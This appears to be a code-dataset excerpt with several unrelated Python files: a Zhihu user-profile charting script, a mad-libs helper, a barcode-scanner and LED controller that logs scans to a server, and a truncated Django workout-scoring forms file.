[]\r\n\r\nfile = open('..\\data.json', 'r', encoding='utf-8')\r\nfor line in file.readlines():\r\n dic = json.loads(line)\r\n # 地理位置\r\n if len(dic['locations']):\r\n locations.append(dic['locations'][0]['name'])\r\n # 性别\r\n gender.append(dic['gender'])\r\n # 知乎名字\r\n name.append(dic['name'])\r\n # 粉丝数\r\n follower_count.append(dic['follower_count'])\r\n # 关注他人数\r\n following_count.append(dic['following_count'])\r\n # 获得赞同数\r\n voteup_count.append(dic['voteup_count'])\r\n # 获得感谢数\r\n thanked_count.append(dic['thanked_count'])\r\n # 回答问题数\r\n answer_count.append(dic['answer_count'])\r\n # 提出问题数\r\n question_count.append(dic['question_count'])\r\n # 写文章数\r\n articles_count.append(dic['articles_count'])\r\n # 教育情况\r\n try:\r\n edu_place = dic['educations'][0]['school']['name']\r\n except:\r\n continue\r\n educations.append(edu_place)\r\n # 公司情况\r\n try:\r\n company_name = dic['employments'][0]['company']['name']\r\n except:\r\n continue\r\n companies.append(company_name)\r\n # 职业情况\r\n try:\r\n job_name = dic['employments'][0]['job']['name']\r\n except:\r\n continue\r\n jobs.append(job_name)\r\n # 行业情况\r\n try:\r\n business_name = dic['business']['name']\r\n except:\r\n continue\r\n business.append(business_name)\r\n\r\n# 男女比例作图\r\ncount_male = 0\r\ncount_female = 0\r\ncount_sex_unknow = 0\r\nfor i in gender:\r\n if i == 1:\r\n count_male+=1\r\n elif i == 0:\r\n count_female+=1\r\n else:\r\n count_sex_unknow+=1\r\nplt.figure(figsize=(6,9))\r\nlabels = [u'男性', u'女性', u'性别不详']\r\nsizes = [count_male, count_female ,count_sex_unknow]\r\ncolors = ['red','yellowgreen','lightskyblue']\r\nexplode = (0.05,0,0)\r\npatches,l_text,p_text = plt.pie(sizes,explode=explode,labels=labels,colors=colors,\r\n labeldistance = 1.1,autopct = '%3.1f%%',shadow = False,\r\n startangle = 90,pctdistance = 0.6)\r\nfor t in l_text:\r\n t.set_size=(30)\r\nfor t in p_text:\r\n t.set_size=(20)\r\nplt.title('男女比例分布—Top15')\r\nplt.axis('equal')\r\nplt.legend()\r\nplt.savefig(\"sexual.jpg\")\r\nplt.show()\r\nwith open(\"sexual.txt\", \"w\") as f:\r\n for j in range(3):\r\n f.write(str(labels[j]) + ' ' + str(sizes[j]) + '\\n')\r\n\r\n\r\n# 地理位置分布 作图\r\nlocations_name = []\r\nlocations_count = []\r\nfor i in range(30):\r\n locations_name.append(Counter(locations).most_common(30)[i][0].strip('市'))\r\n locations_count.append(Counter(locations).most_common(30)[i][1])\r\ndata = locations_count\r\nlabels = locations_name\r\nplt.xticks(rotation=90)\r\nplt.title('地理位置分布—Top30')\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"locations.jpg\")\r\nplt.show()\r\nwith open(\"locations.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 关注数最多\r\ndict_name_follower_count = dict(zip(name,follower_count))\r\ndict_name_follower_count = dict(sorted(dict_name_follower_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in dict_name_follower_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('关注数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"follower_count.jpg\")\r\nplt.show()\r\nwith open(\"follower_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 关注他人数最多\r\ndict_name_following_count = dict(zip(name,following_count))\r\ndict_name_following_count = dict(sorted(dict_name_following_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in dict_name_following_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('关注他人数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"following_count.jpg\")\r\nplt.show()\r\nwith open(\"following_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 获得赞同数\r\nvoteup_count_count = dict(zip(name,voteup_count))\r\nvoteup_count_count = dict(sorted(voteup_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in voteup_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('获得赞同数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"voteup_count.jpg\")\r\nplt.show()\r\nwith open(\"voteup_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 获得感谢数\r\nthanked_count_count = dict(zip(name,thanked_count))\r\nthanked_count_count = dict(sorted(thanked_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in thanked_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('获得感谢数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"thanked_count.jpg\")\r\nplt.show()\r\nwith open(\"thanked_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 回答问题数\r\nanswer_count_count = dict(zip(name,answer_count))\r\nanswer_count_count = dict(sorted(answer_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in answer_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('回答问题数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"answer_count.jpg\")\r\nplt.show()\r\nwith open(\"answer_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 提出问题数\r\nquestion_count_count = dict(zip(name,question_count))\r\nquestion_count_count = dict(sorted(question_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in question_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('提出问题数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"question_count.jpg\")\r\nplt.show()\r\nwith open(\"question_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 写文章数\r\narticles_count_count = dict(zip(name,articles_count))\r\narticles_count_count = dict(sorted(articles_count_count.items(), key=lambda d: d[1], reverse=True))\r\nm_name = []\r\nm_count = []\r\ncnt = 0\r\nfor k, v in articles_count_count.items():\r\n m_name.append(k)\r\n m_count.append(v)\r\n cnt += 1\r\n if cnt == 30:\r\n break\r\ndata = m_count\r\nlabels = m_name\r\nplt.title('写文章数—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"articles_count.jpg\")\r\nplt.show()\r\nwith open(\"articles_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 教育情况\r\nremove_edu_worrds = ['本科', '硕士', '大学', '高中', '初中', '小学', '博士', '研究生']\r\nfor i in educations:\r\n if i in remove_edu_worrds:\r\n educations.remove(i)\r\neducations_count = []\r\neducations_name = []\r\nfor i in range(30):\r\n educations_name.append(Counter(educations).most_common(30)[i][0])\r\n educations_count.append(Counter(educations).most_common(30)[i][1])\r\ndata = educations_count\r\nlabels = educations_name\r\nplt.title('人数最多学校—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"educations_count.jpg\")\r\nplt.show()\r\nwith open(\"educations_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 公司情况\r\nremove_company_worrds = ['无', '无业游民', '医院', '互联网', '微信', '微信公众号', '浙江大学', '自由职业', '私募', '搬砖']\r\nfor i in companies:\r\n if i in remove_company_worrds:\r\n companies.remove(i)\r\ncompanies_count = []\r\ncompanies_name = []\r\nfor i in range(30):\r\n companies_name.append(Counter(companies).most_common(30)[i][0])\r\n companies_count.append(Counter(companies).most_common(30)[i][1])\r\ndata = companies_count\r\nlabels = companies_name\r\nplt.title('人数最多公司—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"companies_count.jpg\")\r\nplt.show()\r\nwith open(\"companies_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 职业情况\r\nremove_jobs_worrds = []\r\nfor i in jobs:\r\n if i in remove_jobs_worrds:\r\n jobs.remove(i)\r\njobs_count = []\r\njobs_name = []\r\nfor i in range(30):\r\n jobs_name.append(Counter(jobs).most_common(30)[i][0])\r\n jobs_count.append(Counter(jobs).most_common(30)[i][1])\r\ndata = jobs_count\r\nlabels = jobs_name\r\nplt.title('人数最多职业—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"jobs_count.jpg\")\r\nplt.show()\r\nwith open(\"jobs_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n# 行业情况\r\nremove_business_worrds = []\r\nfor i in business:\r\n if i in remove_business_worrds:\r\n business.remove(i)\r\nbusiness_count = []\r\nbusiness_name = []\r\nfor i in range(30):\r\n business_name.append(Counter(business).most_common(30)[i][0])\r\n business_count.append(Counter(business).most_common(30)[i][1])\r\ndata = business_count\r\nlabels = business_name\r\nplt.title('人数最多行业—Top30')\r\nplt.xticks(rotation=90)\r\nplt.bar(range(len(data)), data, tick_label=labels, align='center')\r\nplt.savefig(\"business_count.jpg\")\r\nplt.show()\r\nwith open(\"business_count.txt\", \"w\") as f:\r\n for j in range(len(labels)):\r\n f.write(str(labels[j]) + ' ' + str(data[j]) + '\\n')\r\n\r\n\r\n\r\n\"\"\"\r\n词云的实现方式\r\n\"\"\"\r\n\r\n# # 教育情况\r\n# remove_edu_worrds = ['本科', '硕士', '大学', '高中', '初中', '小学', '博士', '研究生']\r\n# for i in educations:\r\n# if i in remove_edu_worrds:\r\n# educations.remove(i)\r\n# educations_count = []\r\n# for i in range(30):\r\n# educations_count.append(Counter(educations).most_common(30)[i])\r\n# plt.title('教育情况—Top30')\r\n# wl_space_split = \" \".join(str(i) for i in educations_count)\r\n# font_path = r':\\Workspace\\22.small\\05.zhihu-user-1000-4.22\\simfang.ttf'\r\n# back_coloring = imread('bg.png')# 设置背景图片\r\n# wc = WordCloud(font_path=font_path, # 设置字体\r\n# background_color=\"white\", # 背景颜色\r\n# max_words=2000, # 词云显示的最大词数\r\n# mask=back_coloring, # 设置背景图片\r\n# max_font_size=100, # 字体最大值\r\n# random_state=42,\r\n# margin=1,\r\n# )\r\n# wc.generate(wl_space_split)\r\n# image_colors = ImageColorGenerator(back_coloring)\r\n# plt.imshow(wc.recolor(color_func=image_colors))\r\n# plt.axis(\"off\")\r\n# # 绘制背景图片为颜色的图片\r\n# plt.figure()\r\n# # plt.imshow(back_coloring, cmap=plt.cm.gray)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# wc.to_file('educations.png')\r\n#\r\n# # 公司情况\r\n# remove_company_worrds = ['无', '无业游民', '医院', '互联网', '微信', '微信公众号', '浙江大学', '自由职业', '私募', '搬砖']\r\n# for i in companies:\r\n# if i in remove_company_worrds:\r\n# companies.remove(i)\r\n# companies_count = []\r\n# for i in range(30):\r\n# companies_count.append(Counter(companies).most_common(30)[i])\r\n# plt.title('人数最多公司—Top30')\r\n# wl_space_split = \" \".join(str(i) for i in companies_count)\r\n# font_path = r':\\Workspace\\22.small\\05.zhihu-user-1000-4.22\\simfang.ttf'\r\n# back_coloring = imread('bg.png')# 设置背景图片\r\n# wc = WordCloud(font_path=font_path, # 设置字体\r\n# background_color=\"white\", # 背景颜色\r\n# max_words=2000, # 词云显示的最大词数\r\n# mask=back_coloring, # 设置背景图片\r\n# max_font_size=100, # 字体最大值\r\n# random_state=42,\r\n# margin=1,\r\n# )\r\n# wc.generate(wl_space_split)\r\n# image_colors = ImageColorGenerator(back_coloring)\r\n# plt.imshow(wc.recolor(color_func=image_colors))\r\n# plt.axis(\"off\")\r\n# # 绘制背景图片为颜色的图片\r\n# plt.figure()\r\n# # plt.imshow(back_coloring, cmap=plt.cm.gray)\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# wc.to_file('companies.png')","repo_name":"sugurs/ZhihuUserSpiderAndAnalysis","sub_path":"analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37366617199","text":"def replace_blank(story, char_start_pos, char_end_pos):\n word = story[char_start_pos:char_end_pos]\n return story[:char_start_pos-1] + '[ {} ]'.format(word) + story[char_end_pos:]\n\n\ndef get_num_blanks(story):\n count = 0\n blank = '_'\n for pos, char in enumerate(story):\n if(char == blank):\n count += 1\n return count\n\n\ndef get_blank_pos(story):\n blank = '_'\n for pos, char in enumerate(story):\n if (char == blank):\n return pos\n\n\ndef randomStory(storyFile, wordTypes):\n with open(storyFile) as file:\n story = file.read()\n\n num_blanks = get_num_blanks(story)\n for num in range(num_blanks):\n blank_pos = get_blank_pos(story)\n\n char_start_pos = blank_pos + 1\n char_end_pos = char_start_pos\n\n while(story[char_end_pos].isalnum()):\n char_end_pos += 1\n\n story = replace_blank(story, char_start_pos, char_end_pos)\n\n return story\n\n\nif __name__ == \"__main__\":\n print(randomStory('story.txt', []), end='')\n pass","repo_name":"akarshijain/duke-summer-computing-institute-2022","sub_path":"module1/mad_libs_game/21_rand_story_1.py","file_name":"21_rand_story_1.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32709199614","text":"# -*- coding: utf-8 -*-\n\"\"\"\ncontroller.py\n\"\"\"\nimport sys\nimport time\nimport json\nimport pygame\nimport requests\nimport serial\nimport os\nimport stat\nimport socket\nimport smtplib\nimport logging\n\nfrom email.mime.text import MIMEText\nfrom blinkstick import blinkstick\nfrom requests.exceptions import ConnectionError\nfrom serial.serialutil import SerialException\nfrom logging.handlers import RotatingFileHandler\nfrom datetime import datetime\nfrom systemParameters import ThisSystem\nfrom usb.core import find as finddev\nfrom usb import util\n\nprint (\"serial.__version__\" + serial.VERSION)\n\n# Flags and counters\nsp = None\npreviousPingServerMessage = None\nscannerFailedCounter = 0\nskipBlinkStick = False\nstartupCompleted = False\n\n# Set up logging\nlogger = logging.getLogger(\"Controller Rotating Log\")\nlogger.setLevel(logging.DEBUG)\nhandler1 = RotatingFileHandler(ThisSystem.log_filename, maxBytes=100000, backupCount=5)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler1.setFormatter(formatter)\nhandler2 = logging.StreamHandler(sys.stdout)\nlogger.addHandler(handler1)\nlogger.addHandler(handler2)\n\n# Preload sound files\npygame.mixer.pre_init(44100, -16, 2, 2048)\npygame.mixer.init()\npygame.init()\nping = pygame.mixer.Sound(ThisSystem.successSound)\nbuzz = pygame.mixer.Sound(ThisSystem.failSound)\n\n# Blink one at a time until all are blue\n# Must have a mimimum delay of 0.02 seconds when changing colors\ndef startup(delay=0.15):\n global startupCompleted\n\n ping.play()\n bs = blinkstick.find_first()\n \n if bs is None:\n startupCompleted = True\n #raise BlinkStickNotConnected\n return False\n \n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"blue\")\n time.sleep(delay)\n\n startupCompleted = True\n \n# Blink change one at a time to green and then back to blue\ndef success(delay=0.1, hold=0.1):\n ping.play()\n \n if skipBlinkStick == True:\n if isBlinkStickAttached()==True:\n if resetBlinkStick() !=True:\n return\n else:\n logger.info(\"BlinkStick has been re-attached.\")\n else:\n return\n \n bs = blinkstick.find_first()\n if bs is None:\n return False\n\n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"green\")\n time.sleep(delay)\n time.sleep(hold)\n\n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"blue\")\n time.sleep(delay)\n\n# Turn all red and stay red\ndef fail(delay=0.1):\n\n buzz.play()\n \n if skipBlinkStick:\n if isBlinkStickAttached():\n if resetBlinkStick() is False:\n return\n else:\n return\n \n bs = blinkstick.find_first()\n \n if bs is None:\n return False\n \n for i in range(8):\n bs.set_color(channel=0, index=i, name=\"red\")\n time.sleep(delay)\n \n# Turn off all LEDs\ndef off():\n if skipBlinkStick:\n if isBlinkStickAttached():\n if resetBlinkStick() is False:\n return\n else:\n return\n \n bs = blinkstick.find_first()\n \n if bs is None:\n return False\n \n for i in range(8):\n bs.set_color(channel=0, index=i, name=None)\n\n# Blink Only first LED\ndef pingSuccess(hold=0.50):\n global skipBlinkStick\n\n if skipBlinkStick:\n if isBlinkStickAttached():\n if resetBlinkStick() is False:\n return\n else:\n return\n skipBlinkStick = False\n bs = blinkstick.find_first()\n \n if bs is None:\n return False\n \n bs.set_color(channel=0, index=0, name=None)\n time.sleep(hold)\n bs.set_color(channel=0, index=0, name=\"blue\")\n time.sleep(hold)\n \n# Log a barcode\ndef log(barcode, instrument):\n\n starttime= datetime.utcnow()\n data = {'BARCODE':barcode, 'INSTRUMENT_NAME':ThisSystem.instrumentID,'START_TIME':starttime}\n resp = requests.post(ThisSystem.log_url, data=data)\n rdata = json.loads( resp.text )\n \n if rdata['ID']:\n success()\n return rdata['ID']\n else:\n fail()\n\n# Check to see if server is up and running\ndef pingServer(serverToPing):\n global previousPingServerMessage\n \n # redirect the response of error and messages to a file \n response = os.system(\"ping -c 1 \" + serverToPing + \"> nodisplay.txt 2>&1\")\n time.sleep (0.1)\n if response == 0:\n \n response = \"Server \" + serverToPing + \" is active.\"\n \n if previousPingServerMessage == response:\n return True\n previousPingServerMessage = response\n \n return True\n else:\n \n response = \"Server \" + serverToPing + \" is DOWN.\"\n \n if previousPingServerMessage is None:\n print (\"response : \" + response)\n previousPingServerMessage = response\n\n return False\n\n# Read the bar code via the serial port\ndef readBarcode():\n global sp\n global ThisSystem\n global scannerFailedCounter\n \n numTries = 5 # was 20 * 10 second for warmup or 2 minutes\n if scannerFailedCounter > 0:\n logger.info(\"Cannot find serial port \" + ThisSystem.serialPort + \" try # : \" + str(scannerFailedCounter))\n if scannerFailedCounter >= numTries:\n errMessage = \"Rebooting system to resetting serial port to \" + ThisSystem.serialPort + \" after \" + str(numTries) + \" tries.\"\n logger.info(errMessage)\n sendEmail(errMessage)\n os.system('sudo shutdown -r now')\n if scannerFailedCounter > 0:\n logger.info(\"Cannot find serial port \" + ThisSystem.serialPort + \" try # : \" + str(scannerFailedCounter))\n if not device_exists(ThisSystem.serialPort):\n return None\n\n # Clear the buffer\n if sp == None:\n sp = serial.Serial(\n port = ThisSystem.serialPort,\n baudrate = ThisSystem.serialBaudrate,\n parity = ThisSystem.serialParity,\n stopbits = ThisSystem.serialStopbits,\n timeout = ThisSystem.serialTimeout,\n xonxoff = ThisSystem.serialXonxoff,\n rtscts = ThisSystem.serialRtscts,\n dsrdtr = ThisSystem.serialDsrdtr\n )\n \n barcode = sp.readline()\n\n # Convert from btye to string data and remove the carriage return that was generated by the bar code reader\n barcode = str(barcode,'utf-8').rstrip('\\r')\n scannerFailedCounter = 0\n return barcode\n\n# Send an email with an error message\ndef sendEmail(errmsg):\n global lastError, previousError\n \n try:\n if ThisSystem.sendEmail == True:\n ## **************************************************************************\n ## for sending emails when no authentication is required\n ## \n computerName = socket.gethostname()\n msg = MIMEText(errmsg)\n sendFrom = ThisSystem.instrumentID\n msg['Subject'] = \"Error message from \" + sendFrom + \". computer : \" + computerName\n msg['From'] = ThisSystem.instrumentID\n msg['To'] = ThisSystem.emailUsers\n toRecipients = ThisSystem.emailUsers.split(',') \n print (\"Sending email to : \" + ThisSystem.emailUsers)\n print (\"Message sent : \" + errmsg)\n server = smtplib.SMTP(ThisSystem.emailServer, 25)\n server.starttls()\n server.sendmail(sendFrom, toRecipients, str(msg))\n server.quit()\n \n ## **************************************************************************\n ## for sending emails requing authentication\n ##\n ##computerName = socket.gethostname()\n ##msg = MIMEText(errmsg)\n ##sendFrom = ThisSystem.instrumentID\n ##msg['Subject'] = \"Error message from \" + sendFrom + \". computer : \" + computerName\n ##msg['From'] = ThisSystem.instrumentID\n ##msg['To'] = ThisSystem.emailUsers\n ##toRecipients = ThisSystem.emailUsers.split(',') \n #print (\"Sending the following email msg to : \" + + ThisSystem.emailUsers)\n #print (\"Message sent : \" + errmsg)\n ##server = smtplib.SMTP('smtp.gmail.com', 587)\n ##server.login(\"williamneil777@gmail.com\", \"putpasswordinhere\")\n ##server.sendmail(\"FromUser@gmail.com\", \"WilliamNeil777@gmail.com\", str(msg))\n ##server.quit()\n ## **************************************************************************\n else:\n print (\"skipping email\")\n return\n except Exception as e:\n return\n\n# Determine if the device name exists \ndef device_exists(path):\n global scannerFailedCounter\n try:\n if stat.S_ISBLK(os.stat(path).st_mode) == False:\n sp = None\n return True\n \n else: \n sp = None\n scannerFailedCounter = scannerFailedCounter + 1\n return False\n \n except Exception as e:\n scannerFailedCounter = scannerFailedCounter + 1\n time.sleep(10)\n return False\n\n# Determine the vendor id and product Id by running the lsusb command in terminal\ndef isBlinkStickAttached():\n try:\n dev = finddev(idVendor = ThisSystem.idVendor, idProduct = ThisSystem.idProduct)\n if dev is not None:\n #manufacturer = util.get_string(dev,256,1)\n #deviceDescription = util.get_string(dev,256,2)\n #deviceSerialNumber = util.get_string(dev,256,3)\n #print (\"Manufacturer : \" + manufacturer)\n #print (\"Device Description : \" + deviceDescription )\n #print (\"Device SerialNumber : \" + deviceSerialNumber )\n startup()\n logger.info(\"BlinkStick is attached\")\n return True\n else:\n logger.info(\"BlinkStick is NOT attached.\") \n return False\n except Exception as e:\n return False\n\n# This will refresh the usb port for the Blink stick after it fails to initialize\n# (Without this command it is not possible to call blinkstick.find_first()\n# (a second time (an un recoverable exception error unless it is plugged back in and is reset)\ndef resetBlinkStick():\n return\n print (\"resetting BlinkStick\")\n dev = finddev(idVendor = 0x20a0, idProduct = 0x41e5)\n if dev is not None:\n logger.info(\"Resetting usb port after Blink Stick has been attached.\")\n dev.reset()\n return True\n else:\n return False\n\n# Run the controller\ndef runController():\n global skipBlinkStick, startupCompleted, sp\n lastError = None\n previousError = None\n startupCompleted = False\n skipBlinkStick = False\n logger.info(\"Controller Started.\")\n \n while True:\n try:\n if startupCompleted == False:\n logger.info(\"Initializing BlinkStick.\")\n startup()\n \n barcode = readBarcode()\n if pingServer(ThisSystem.log_server) == True:\n pingSuccess()\n else:\n raise ConnectionError\n\n if barcode is None:\n time.sleep (0.1)\n continue\n \n if len(barcode) > 0: \n ID = log(barcode,ThisSystem.instrumentID)\n logger.info(\"Barcode : \" + barcode + \" ID returned from server : \" + str(ID)) \n previousError = None\n skipBlinkStick = False\n\n except blinkstick.BlinkStickException as e:\n lastError = e\n\n if str(lastError) != str(previousError):\n lastErrorMsg = \"Blink Stick Exception. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n skipBlinkStick = True\n resetBlinkStick()\n fail()\n logger.error(lastError)\n previousError=lastError\n\n except AttributeError as e:\n\n print (\"Attribute Error\")\n if str(lastError) != str(previousError):\n lastErrorMsg = \"Blink Stick Attubute Exception. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n skipBlinkStick = True\n fail()\n logger.error(lastError)\n previousError=lastError\n resetBlinkStick()\n\n except USBError as e:\n lastError = e\n \n if str(lastError) != str(previousError):\n lastErrorMsg = \"Blink Stick Exception. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n skipBlinkStick = True\n fail()\n logger.error(lastError)\n previousError=lastError \n \n except ConnectionError as e:\n lastError = e\n if str(lastError) != str(previousError):\n \n previousError = lastError\n lastErrorMsg = str(lastError) + \"server : \" + ThisSystem.log_url\n fail()\n logger.error(lastErrorMsg)\n \n \n except NoSuchSerialPort as e:\n lastError = e\n sp = None\n \n if str(lastError) != str(previousError):\n \n previousError = lastError\n lastErrorMsg = \"Cannot find serial port device: \" + ThisSystem.serialPort + \". Barcode reader may not be attached or the port name is incorrect.\"\n fail()\n logger.error(lastErrorMsg)\n sendEmail(str(lastErrorMsg))\n # give time for scanner to initialize\n time.sleep(10)\n \n except SerialException as e:\n lastError = e\n sp = None \n if str(lastError) != str(previousError):\n previousError = lastError\n lastErrorMsg = \"Serial Port error: \" + ThisSystem.serialPort + \". Barcode reader may not be attached or there is some other error.\"\n fail()\n logger.error(lastError)\n sendEmail(str(lastErrorMsg))\n previousError=lastError\n\n except PingServerError as e:\n lastError = e\n\n if str(lastError) != str(previousError):\n lastErrorMsg = \"Ping server error. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n fail()\n logger.error(lastError)\n previousError=lastError\n\n except BrokenPipeError as e:\n lastError = e\n print (\"broken pipe caught\")\n print (lastError)\n if str(lastError) != str(previousError):\n lastErrorMsg = \"BrokenPipeError. Url : \" + ThisSystem.log_server\n logger.info(lastError)\n fail()\n logger.error(lastError)\n previousError=lastError\n resetBlinkStick()\n\n except Exception as e:\n lastError = e\n typeError = type(e).__name__\n if \"USBERR\" not in typeError:\n \n print (\"Unanticipated exception\")\n print (type(e).__name__)\n print (e.__class__.__name__)\n print (lastError)\n skipBlinkStick = True\n #resetBlinkStick()\n if str(lastError) != str(previousError):\n \n previousError = lastError\n lastErrorMsg = \"Exception error : \" + str(lastError)\n fail()\n logger.error(lastError)\n sendEmail(str(lastErrorMsg))\n previousError=lastError\n\n# Custom Exceptions\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n\n##class BlinkStickException(Error):\n## \"\"\"Raised when the Blinkstick cannot be initialized\"\"\"\n## pass\n\nclass USBError(Error):\n \"\"\"Raised when the Blinkstick cannot be initialized\"\"\"\n pass\n\nclass NoSuchSerialPort(Error):\n \"\"\"Raised when the serial port does not exist\"\"\"\n pass\n\nclass PingServerError(Error):\n \"\"\"Raised when the Blinkstick cannot be initialized\"\"\"\n pass\n\nif __name__ == '__main__':\n runController()\n","repo_name":"russomf/IoT_controller","sub_path":"python_controller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":16326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12637947472","text":"import collections\nimport itertools\n\nfrom django import forms\n\nfrom explodio.common import iterator\nfrom explodio.common.forms import FormHelpersMixin\nfrom explodio.xfit import models\n\n\nclass ScoreForm(forms.Form):\n \"\"\"\n Base form for keeping score of a Workout\n \"\"\"\n pass\n\nclass TimeForm(ScoreForm):\n \"\"\"\n Score Form for Time\n \"\"\"\n time = forms.TimeField(required=False, label=\"Time (HH:MM:SS)\")\n\nclass RoundsForm(ScoreForm):\n \"\"\"\n Score Form for Rounds\n \"\"\"\n rounds = forms.IntegerField(min_value=0, required=False,\n label='Rounds/Reps')\n\nclass WODExerciseForm(forms.ModelForm, FormHelpersMixin):\n \"\"\"\n Individual form for a WODExercise for a user to fill out\n \"\"\"\n\n # Require fields if the value of the attribute is not empty\n REQUIRE_IF_VALUE = (\n ('effort', 'effort_unit'),\n ('reps', 'reps_unit'),\n )\n\n class Meta:\n fields = ('effort', 'reps', 'notes')\n model = models.WODExercise\n\n def __init__(self, goal, *args, **kwargs):\n \"\"\"\n Construct a WODExerciseForm for a given goal\n\n effort / reps fields are deleted if they are not set in the goal.\n\n :param goal: The WorkoutExercise with the target effort/reps\n :param args: ModelForm *args\n :param kwargs: ModelForm **kwargs\n :return: self\n \"\"\"\n super(WODExerciseForm, self).__init__(*args, **kwargs)\n\n self.goal = goal\n\n for required, if_clone in WODExerciseForm.REQUIRE_IF_VALUE:\n if not getattr(goal, if_clone):\n del self.fields[required]\n\n def save(self, user_wod, commit=True):\n \"\"\"\n Save this WODExercise to a user_wod.\n To save DB, we only save if there are values in the fields.\n :param user_wod: The parent UserWOD to save to\n :param commit: Whether or not the commit the save\n :return: The new or updated WODExercise\n \"\"\"\n\n should_save = False\n\n for field in ('effort', 'reps', 'notes'):\n if self.cleaned_data.get(field):\n should_save = True\n break\n\n if self.instance and self.instance.id and not should_save:\n self.instance.delete()\n elif should_save:\n instance = super(WODExerciseForm, self).save(commit=False)\n 